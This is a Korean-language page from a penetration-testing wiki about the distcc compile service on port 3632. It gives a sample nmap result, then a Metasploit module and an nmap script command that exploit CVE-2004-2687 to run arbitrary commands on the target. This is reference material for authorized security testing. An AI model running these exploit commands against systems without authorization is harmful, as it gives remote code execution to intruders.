hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

기본 정보

Distcc는 네트워크의 다른 컴퓨터의 유휴 처리 능력을 활용하여 컴파일 프로세스를 향상시키는 도구입니다. distcc가 머신에 설정되면, 이 머신은 다른 시스템에 컴파일 작업을 분배할 수 있습니다. 이 수신 시스템은 distccd 데몬이 실행 중이어야 하며, 전송된 코드를 처리할 수 있는 호환 가능한 컴파일러가 설치되어 있어야 합니다.

기본 포트: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

CVE-2004-2687에 취약한지 확인하여 임의 코드를 실행합니다:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

이 서비스는 shodan이 탐지하지 않는 것 같습니다.

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}